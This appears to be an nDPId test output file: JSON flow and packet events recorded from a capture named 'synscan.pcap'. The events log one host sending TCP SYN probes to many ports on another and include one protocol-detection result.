+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsFxcAADoG91usEAAIQA2GNIzSJxrdUoMYAAAAAGACDAAFdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsAXUAADoGDP6sEAAIQA2GNIzSFlbdUoMYAAAAAGACDAAWOQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+cAAC0Ga4usEAAIQA2GNIzSDGDdUoMYAAAAAGACCAAkLwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsi1sAADkGhBesEAAIQA2GNIzSC77dUoMYAAAAAGACCAAk0QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uIAADYGP5CsEAAIQA2GNIzTBDbdU4MZAAAAAGACDAAoVgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsPTUAAC8G3D2sEAAIQA2GNIzTAS3dU4MZAAAAAGACEAAnXwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5EAACoGXuGsEAAIQA2GNIzTH\/XdU4MZAAAAAGACDAAMlwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsciYAADQGokysEAAIQA2GNIzTE4ndU4MZAAAAAGACBAAhAwAAAgQFtA=="} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs7U0AACoGMSWsEAAIQA2GNIzTBDDdU4MZAAAAAGACDAAoXAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsSkwAACkG1SasEAAIQA2GNIzTJpTdU4MZAAAAAGACCAAJ+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAAC4GFm6sEAAIQA2GNIzTGW7dU4MZAAAAAGACDAATHgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs3bMAADkGMb+sEAAIQA2GNIzTB+bdU4MZAAAAAGACCAAopgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsZGUAADgGrA2sEAAIQA2GNIzTCU\/dU4MZAAAAAGACBAArPQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsU4AAACcGzfKsEAAIQA2GNIzTE7vdU4MZAAAAAGACEAAU0QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsFDQAADcG\/T6sEAAIQA2GNIzTFR3dU4MZAAAAAGACEAATbwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAssJ8AAC4GadOsEAAIQA2GNIzTBI3dU4MZAAAAAGACDAAn\/wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAskycAADgGfUusEAAIQA2GNIzTH5LdU4MZAAAAAGACBAAU+gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsqRsAADMGbFesEAAIQA2GNIzTBBLdU4MZAAAAAGACEAAkegAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAsY3EAADQGsQGsEAAIQA2GNIzTBBHdU4MZAAAAAGACBAAwewAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAstmwAADkGWQasEAAIQA2GNIzTJxPdU4MZAAAAAGACCAAJeQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_packet_id":1,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059742,"pkt":"ACYLMQczACWzv5HuCABFAAAs4BMAACgGQF+sEAAIQA2GNIzTCp3dU4MZAAAAAGACBAAp7wAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsVvUAADIGv32sEAAIQA2GNIzTAmndU4MZAAAAAGACDAAqIwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsyjsAADEGTTesEAAIQA2GNIzTBHXdU4MZAAAAAGACCAAsFwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsKc0AACYG+KWsEAAIQA2GNIzTBDfdU4MZAAAAAGACDAAoVQAAAgQFtA=="} 